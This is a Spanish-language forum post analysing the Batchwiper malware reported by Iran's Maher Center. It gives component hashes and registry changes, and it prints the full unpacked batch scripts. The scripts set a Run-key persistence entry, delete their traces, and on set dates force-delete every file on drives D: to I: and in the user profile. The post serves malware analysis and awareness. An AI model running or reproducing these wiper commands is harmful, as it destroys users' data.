Batchwiper

Iniciado por m0sh, 6 Enero 2013, 19:48 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

m0sh

6 Enero 2013, 19:48 PM Ultima modificación: 6 Enero 2013, 21:17 PM por Karcrack
Hola a todos de nuevo, primero que todo les deseo un feliz y muy prospero año 2013 ;-D

----

Una investigación realizada por el Maher Center en Irán identifico un tipo de malware que elimina la información de los discos duros. Al realizar un análisis del funcionamiento se encontró que el proceso de limpieza de los archivos se ejecuta en determinadas fechas del año. Aunque el diseño del mismo es muy sencillo (simples componentes batch ) funciona y limpia el contenido de las unidades del disco duro: D:, E:, F:, G:, H:, I:

Los componentes son:

Código [Seleccionar]
GrooveMonitor.exe -  f3dd76477e16e26571f8c64a7fd4a9
juboot.exe -  fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe - c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE - ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe - b7117b5d8281acd56648c9d08fadf630

Al ejecutar el Dropper GrooveMonitor.exe este extrae los componentes juboot.exe y jucheck.exe los cuales están comprimidos con UPX 3.03, al descomprimirlos se encontraron los siguientes scripts:

juboot.exe

Código (dos) [Seleccionar]
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"



jucheck.exe

Código (dos) [Seleccionar]
@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

:loop
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\*.*" /q /s /f
\\start calc
exit
:no
sleep for 3000
goto loop



Modificaciones en el registro de Windows
Código [Seleccionar]

----------------------------------
Values added:8
----------------------------------
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\qbphzragbf\Ongpujvcre\TebbirZbavgbe.rkr: 01 00 00 00 06 00 00 00 F0 B9 E5 23 27 EC CD 01
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\jucheck.exe: "C:\WINDOWS\system32\jucheck.exe"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-31275: "Esta sección muestra el tamaño, tipo de archivo y otra información acerca del elemento seleccionado."
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\documentos\Batchwiper\GrooveMonitor.exe: "GrooveMonitor"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\juboot.exe: "Java(TM) Update Checker"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Configuración local\temp\1.tmp\juboot.bat: "juboot"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Configuración local\temp\4.tmp\jucheck.bat: "jucheck"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\WinRAR SFX\C%%WINDOWS%system32%: "C:\WINDOWS\system32\"



Enlaces

http://www.certcc.ir/index.php?name=news&file=article&sid=2293


www.NYXBONE.com
Twiter: @nyxbone
Imprimir
Ir Arriba Páginas1
Acciones del Usuario